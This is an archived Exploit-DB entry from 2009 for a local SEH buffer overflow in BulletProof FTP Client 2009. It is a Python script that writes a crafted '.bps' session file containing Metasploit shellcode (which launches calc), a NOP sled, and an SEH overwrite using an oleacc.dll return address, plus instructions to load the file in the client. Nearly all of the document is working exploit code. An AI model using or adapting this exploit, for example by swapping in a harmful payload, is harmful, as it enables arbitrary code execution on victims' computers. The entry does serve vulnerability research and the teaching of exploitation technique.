BulletProof FTP Client 2009 - '.bps' Local Buffer Overflow (SEH)

EDB-ID:

8420

Author:

His0k4

Type:

local

Platform:

Windows

Published:

2009-04-13

#!/usr/bin/python
#[*] Bug : 	    BulletProof FTP Client 2009 (.bps) Buffer Overflow Exploit (SEH)
#[*] Credits :      Stack
#[*] Tested on :    Xp sp2 (fr)
#[*] Exploited by : His0k4
#[*] Greetings :    All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com
#[*] Chi3arona houa :        Serra7 merra7,koulchi mderra7 :D
#[*] translate by Cyb3r-1st: esse7 embe7 embou :D

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode=(
"\x33\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x71"
"\x4f\xd8\x8d\x83\xeb\xfc\xe2\xf4\x8d\xa7\x9c\x8d\x71\x4f\x53\xc8"
"\x4d\xc4\xa4\x88\x09\x4e\x37\x06\x3e\x57\x53\xd2\x51\x4e\x33\xc4"
"\xfa\x7b\x53\x8c\x9f\x7e\x18\x14\xdd\xcb\x18\xf9\x76\x8e\x12\x80"
"\x70\x8d\x33\x79\x4a\x1b\xfc\x89\x04\xaa\x53\xd2\x55\x4e\x33\xeb"
"\xfa\x43\x93\x06\x2e\x53\xd9\x66\xfa\x53\x53\x8c\x9a\xc6\x84\xa9"
"\x75\x8c\xe9\x4d\x15\xc4\x98\xbd\xf4\x8f\xa0\x81\xfa\x0f\xd4\x06"
"\x01\x53\x75\x06\x19\x47\x33\x84\xfa\xcf\x68\x8d\x71\x4f\x53\xe5"
"\x4d\x10\xe9\x7b\x11\x19\x51\x75\xf2\x8f\xa3\xdd\x19\xbf\x52\x89"
"\x2e\x27\x40\x73\xfb\x41\x8f\x72\x96\x2c\xb9\xe1\x12\x4f\xd8\x8d")

header1=(
"\x54\x68\x69\x73\x20\x69\x73\x20\x61\x20\x42\x75\x6c\x6c\x65\x74"
"\x50\x72\x6f\x6f\x66\x20\x46\x54\x50\x20\x43\x6c\x69\x65\x6e\x74"
"\x20\x53\x65\x73\x73\x69\x6f\x6e\x2d\x46\x69\x6c\x65\x20\x61\x6e"
"\x64\x20\x73\x68\x6f\x75\x6c\x64\x20\x6e\x6f\x74\x20\x62\x65\x20"
"\x6d\x6f\x64\x69\x66\x69\x65\x64\x20\x64\x69\x72\x65\x63\x74\x6c"
"\x79\x2e\x0d\x0a")

exploit =  "passwords.hotmail.com"
exploit += "\x90"*68
exploit += "\x74\x06\x90\x90" #oplaa!
exploit += "\x98\x6A\xBF\x74" #oleacc.dll (xp sp2)
exploit += shellcode

header2=(
"\x0a\x32\x31\x0d\x0a\x41\x42\x41\x42\x43\x0d\x0a\x62\x70\x68\x67\x71"
"\x64\x6e\x62\x6a\x6a\x67\x61\x65\x62\x0d\x0a\x63\x3a\x5c\x0d\x0a"
"\x2f\x0d\x0a")

vuln = header1 + exploit + header2

try:
    out_file = open("sploit.bps",'w')
    out_file.write(vuln)
    out_file.close()
    print "\nSession file created!\n\nNow Go to: file>Load BP Session then chose it and clic Connect\n"
except:
    print "Error!"

# milw0rm.com [2009-04-13]